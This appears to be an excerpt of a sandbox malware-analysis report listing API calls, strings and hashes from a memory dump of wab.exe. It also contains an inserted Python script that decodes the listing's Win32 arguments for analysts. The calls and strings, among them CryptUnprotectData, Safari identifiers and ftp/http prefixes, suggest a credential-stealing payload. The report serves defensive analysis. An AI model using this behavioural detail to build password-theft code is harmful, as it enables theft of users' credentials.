                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
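The "APIs" lines above (CreateFileW at refs 004096D5 and 004096EE, RegOpenKeyExW at ref 004145A5, FindClose at ref 0040AEC8) carry their arguments as raw stack DWORDs, which hides what the dumped wab.exe code is actually asking for. The following is an added example, not Joe Sandbox tooling or anything from the sample, that parses lines in this listing's shape and renames the well-known Win32 constants: access mask, share mode and creation disposition for CreateFileW, root key and access mask for RegOpenKeyExW, plus every pointer the plugin already resolved to a string (paths, registry subkeys, the "*.*" search pattern) as a quick IOC list. The sample input is a constructed, shortened copy of four entries from this listing. One caveat drives the design: the plugin prints a stack snapshot, not a clean parameter list (in the RegOpenKeyExW entry the second slot shows 80000002 where the lpSubKey pointer would be), so the decoder only trusts the leading slots that do line up, and its output is a triage hint to be confirmed at the ref address in the dump.

```python
import re

# Constructed sample: four "APIs" lines in the shape the Joe Sandbox IDA-plugin
# listing uses for the wab.exe memory dump (process 17, image base 0x400000).
SAMPLE_LINES = [
    "• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,"
    "00000000,00000000,0044509F), ref: 004096D5",
    "• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,"
    "00000000,00000000,0040E0F1,00000104), ref: 004096EE",
    "• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,"
    "00414CC1,80000002,Software\\Microsoft\\Windows\\CurrentVersion\\Explorer"
    "\\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5",
    "• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000), "
    "ref: 0040AEC8",
]

# One listing line: optional bullet, optional "Part of subcall function X:" prefix,
# API.MODULE, optional (args), then "ref: <hex>".
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w?@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (values from the Windows SDK headers).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}


def parse_api_line(line):
    """Split one listing line into api, module, raw argument tokens and call site."""
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # A resolved path containing ',' would need a smarter split; none occur here.
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": m.group("ref").upper().zfill(8), "args": args}


def _num(tok):
    """8-hex-digit tokens are stack DWORDs; '?' and resolved strings are not numbers."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def _bits(value, table):
    """Render a bitmask with the names in table; bits the table lacks stay as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def decode_call(rec):
    """Add symbolic names for calls whose leading stack slots are the real parameters."""
    api, args = rec["api"], rec["args"]
    out = {"api": api, "module": rec["module"], "ref": rec["ref"]}
    # Any non-numeric token is a string the plugin resolved from a pointer.
    out["strings"] = [a for a in args if a not in ("", "?") and _num(a) is None]
    if api in ("CreateFileW", "CreateFileA") and len(args) >= 5:
        # (lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, ...)
        out["access"] = _bits(_num(args[1]), GENERIC_ACCESS)
        out["share"] = _bits(_num(args[2]), SHARE_MODE)
        disp = _num(args[4])
        out["disposition"] = DISPOSITION.get(disp, "?" if disp is None else f"0x{disp:X}")
    elif api in ("RegOpenKeyExW", "RegOpenKeyExA") and len(args) >= 4:
        # (hKey, lpSubKey, ulOptions, samDesired, phkResult); only slots 0 and 3 are trusted.
        root, sam = _num(args[0]), _num(args[3])
        out["root"] = HKEY_ROOTS.get(root, "?" if root is None else f"0x{root:X}")
        out["sam"] = REG_SAM.get(sam, "?" if sam is None else f"0x{sam:X}")
        out["subkey"] = next((a for a in out["strings"] if "\\" in a), None)
    return out


def summarize(lines):
    """Decode every API line in a block of listing text; other lines are skipped."""
    parsed = (parse_api_line(line) for line in lines)
    return [decode_call(rec) for rec in parsed if rec]


if __name__ == "__main__":
    for rec in summarize(SAMPLE_LINES):
        print(rec)
```

Run against the sample, the two CreateFileW sites decode to GENERIC_READ / FILE_SHARE_READ|FILE_SHARE_WRITE / OPEN_EXISTING and GENERIC_WRITE / FILE_SHARE_READ / CREATE_ALWAYS, i.e. one read-only open of an existing file and one create-or-truncate for writing, and the RegOpenKeyExW site decodes to HKEY_LOCAL_MACHINE with KEY_READ on the Shell Folders subkey. Feeding the whole "APIs" section of a report through summarize() gives a per-call-site table that is far quicker to scan than the raw listing; anything surprising should still be checked in the disassembly at the ref address, since the stack slots beyond the declared parameters are just whatever was on the stack.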
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID:
                                                              • API String ID: 2081463915-0
                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                              • GetLastError.KERNEL32 ref: 00409974
                                                              • CloseClipboard.USER32 ref: 0040997D
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                              • String ID:
                                                              • API String ID: 2565263379-0
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00409882
                                                              • wcslen.MSVCRT ref: 0040988F
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                              • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                              • memcpy.MSVCRT ref: 004098B5
                                                              • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                              • CloseClipboard.USER32 ref: 004098D7
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                              • String ID:
                                                              • API String ID: 2014503067-0
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Similarity
                                                              • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 403622227-2664311388
                                                              APIs
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              • OpenClipboard.USER32(?), ref: 00411878
                                                              • GetLastError.KERNEL32 ref: 0041188D
                                                              • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                              Similarity
                                                              • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                              • String ID:
                                                              • API String ID: 1203541146-0
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                              • memset.MSVCRT ref: 0040265F
                                                              • memcpy.MSVCRT ref: 0040269B
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • memcpy.MSVCRT ref: 004026FF
                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                              Similarity
                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                              • API String ID: 2929817778-1134094380
                                                              Similarity
                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                              • String ID: :stringdata$ftp://$http://$https://
                                                              • API String ID: 2787044678-1921111777
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                              • GetDC.USER32 ref: 004140E3
                                                              • wcslen.MSVCRT ref: 00414123
                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                              • _snwprintf.MSVCRT ref: 00414244
                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 2080319088-3046471546
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                              • memset.MSVCRT ref: 00413292
                                                              • memset.MSVCRT ref: 004132B4
                                                              • memset.MSVCRT ref: 004132CD
                                                              • memset.MSVCRT ref: 004132E1
                                                              • memset.MSVCRT ref: 004132FB
                                                              • memset.MSVCRT ref: 00413310
                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                              • memset.MSVCRT ref: 004133C0
                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                              • memcpy.MSVCRT ref: 004133FC
                                                              • wcscpy.MSVCRT ref: 0041341F
                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                              Strings
                                                              • {Unknown}, xrefs: 004132A6
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                              • API String ID: 4111938811-1819279800
                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                              • String ID:
                                                              • API String ID: 829165378-0
                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                              APIs
                                                              • memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 004041D6
                                                              • wcscpy.MSVCRT ref: 004041E7
